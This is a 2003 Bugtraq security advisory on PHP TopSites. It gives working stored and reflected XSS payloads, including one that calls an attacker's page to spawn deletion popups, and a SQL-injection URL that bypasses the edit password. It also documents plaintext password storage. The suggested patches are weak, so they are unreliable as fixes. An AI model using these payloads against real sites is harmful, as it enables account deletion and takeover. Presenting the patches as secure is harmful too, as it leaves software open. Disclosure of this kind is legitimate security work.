Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Multiple PHP Topsites Vulnerabities found

From: Cyberarmy Application and Code Auditing Team <paragod () phreaker net>
Date: 15 Jan 2003 16:22:13 -0000


Multiple PHP Topsites Vulnerabities found 

PHP TopSites is a PHP/MySQL-based customizable TopList script. Main 
features include: Easy configuration config file; MySQL database backend; 
unlimited categories, Site rating on incoming votes; Special Rating from 
Webmaster; anti-cheating gateway; Random link; Lost password function; 
Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-
Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more. 
http://www.itop10.net/products/ 
 
The thousands of sites that use PHP Topsites are strongly advised to 
upgrade, fix or discard their phptopsites scripts.
 
 
 
Vulnerability 1. 
 
Critical XSS Vulnerability in all versions of PHP TopSites 
 
Version: All 
Script: Add.php 
Because PHP TopSites does not have session authentication, it allows an 
attacker to use an XSS vulnerability to do things like delete, edit, and 
change user accounts by having an unknowing admin run the code. By putting 
the following in the description field when adding a new website to any 
particular topsite, it's almost impossible for any admin not to run the 
following code (unless they have customized browser security settings).  
The following code is executed when the admin loads the page.  He has to 
do nothing but load the page in order to validate a site and the integrity 
of the database can be destroyed as the code is never parsed out of the 
field and the page does not display it, it executes it.  Below are a few 
examples - placed into the description field when adding a new site.
 
<body 
onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/sedi
tor.php?sid=siteidnumber&a=delete'">
 
This code will effectively delete the user account with the site id number 
as soon as the admin loads the page.
 
<body onLoad="window.open('http://attackerswebsite/launcher.htm&apos;)">
 
Using this code, an attacker can open a popup window to a page on his site 
that contains code for several more popup windows.  Each window can be 
used to delete a site from the PHP TopSites database.  This method can 
totally erase a TopSites database as soon as the admin loads the page.
 
To fix this vulnerability open add.php and find:
 
if (!$name) { $err.= "Please enter your name.<BR>"; }
if (!$passw) { $err.= "Please enter password.<BR>"; }
if (!$email) { $err.= "Please enter your email address.<BR>"; }
if (!$title) { $err.= "Please enter site title.<BR>"; }
if (!$url) { $err.= "Please enter site url.<BR>"; }
if (!$banner_w) { $err.= "Please enter banner width.<BR>"; }
if (!$banner_h) { $err.= "Please enter banner height.<BR>"; }
if (!$description) { $err.= "Please enter site description.<BR>"; }
if (!$category) { $err.= "Please enter site category.<BR>"; }
if (check_email_addr($email) == 0) { $err.= "Please enter valid email
address.<BR>"; }
 
Below it paste:
 
///////////////////////////////////////////////////////////////////////////
//////////////////////// 
// Critical XSS Vuln Fix By JeiAr = (jeiar () kmfms com) January 12 2003 - 
All Versions PHP Topsites //
///////////////////////////////////////////////////////////////////////////
////////////////////////
 
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $name)) {$err.= "Please enter A 
valid Name.<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $passw)) {$err.= "Please enter A 
valid Password<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $title)) {$err.= "Please enter A 
valid Title<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $linkback)) {$err.= "Please enter A 
valid Linkback<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $url)) {$err.= "Please enter A 
valid URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_url)) {$err.= "Please enter 
A valid Banner URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_w)) {$err.= "Please enter A 
valid Banner Width<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_h)) {$err.= "Please enter A 
valid Banner Height<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $description)) {$err.= "Please 
enter A valid Description<BR>";}
if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $category)) {$err.= "Please enter A 
valid Category<BR>";}
///////////////////////////////////////////////////////////////////////////
/////////////////////////
 
 
 

Vulnerability 2. 
 
XSS Vulnerability in all versions of PHP TopSites 
 
Version: All 
Script: help.php 
Because PHP TopSites does not have session authentication, it allows an 
attacker to use an XSS vulnerability steal cookies or other user-supplied 
information.  The page being generated with unvalidated input from 
untrustworthy sources causes this vulnerability. The developer is urged to 
implement session authentication into this script.  The following example 
lies in the help.php file.
 
http://somewebsitesite/TopSitesdirectory/help.php?sid=&lt;script&gt;alert
(document.cookie)&lt;/script&gt;
 
 
 

Vulnerability 3. 
 
Plaintext Password Disclosure Vulnerability in all versions of PHP 
TopSites 
 
Version: All 
Script: seditor.php 
No current versions of PHP TopSites encrypt user passwords, and these 
plaintext passwords can be viewed by anyone with access to the admin panel 
or edit.php page. Any Topsite Admin (or intruder) can possibly use the 
user supplied password to try and compromise the security of the user 
supplied website and or the user supplied email account. So anyone signing 
up for a TopList using PHP TopSites should keep this in mind, and it 
should also be noted to anyone using the same password for everything, 
that this is generally not a very good habit to have. This vulnerability 
affects all versions. A suggestion to the developer would be to crypt the 
passes via md5, and not allow the password to be displayed to an admin 
when editing a TopList user(s).
 
 
 

Vulnerability 4. 
 
PHP TopSites User Account Compromise Vulnerability in All Pro versions and 
in 1.xx Free versions 
 
Version: All Pro Versions and Free Versions 1.xx 
Script:edit.php 
This is exploitable because of two conditions in the PHP/MYSQL 
configuration. Firstly, register_globals parameter is on in php.ini, which 
automatically turns every variable into a global variable. Secondly, the 
underlying database is MYSQL, which does not require numeric criteria in 
the SQL statement to be quoted. This allows an attacker to bypass the 
magic_quoted_gpcs protection in PHP manipulating numeric parts of a query. 
It is possible for an attacker to use SQL injection to expose all user 
account details for any user he or she knows the id number of. All site ID 
numbers of a particular Top List are made available on the index.php page. 
The vulnerable code resides 
 
in edit.php.  Examples are listed below.
 
http://examplewebsite.com/topsitesdirectory/edit.php?
a=pre&submit=&sid=siteidnumber--
 
This injection negates the use of a password and provides access to the 
TopList edit page.  All information about a particular site can be viewed 
and edited from this page.  One thing to note, the password is displayed 
as plaintext on this page also. All users of the 1.XX Free script(s) are 
urged to upgrade their scripts as soon as possible. If you are not able to 
upgrade, the below code should serve as a quick fix. 
 
In the Edit.php file change:
$query = mysql_db_query ($dbname,"Select * from top_user Where sid=$sid 
AND password='$passw'",$db) or die (mysql_error()); 
 
to:
 
$query = mysql_db_query ($dbname,"Select * from top_user Where 
sid='$sid'AND password='$passw'",$db) or die (mysql_error());
 

In conclusion, the vulnerabilities in this script make it very easy for an 
attacker to exploit. The vulnerabilities present in this script compromise 
the security of user accounts, the integrity of the data in the database, 
and the security of the server it is hosted on. All administrators that 
are currently using this script in their websites are strongly urged to 
patch or upgrade the PHP TopSites script. Some versions, such as the Pro 
version, have no developer upgrades or patches available at the time of 
this writing, so they are still vulnerable to the attacks mentioned above.
 
All Credits go to the CyberArmy Application and Code Auditing Team and 
CyberArmy Security Research
Previous By Date Next
Previous By Thread Next

Current thread: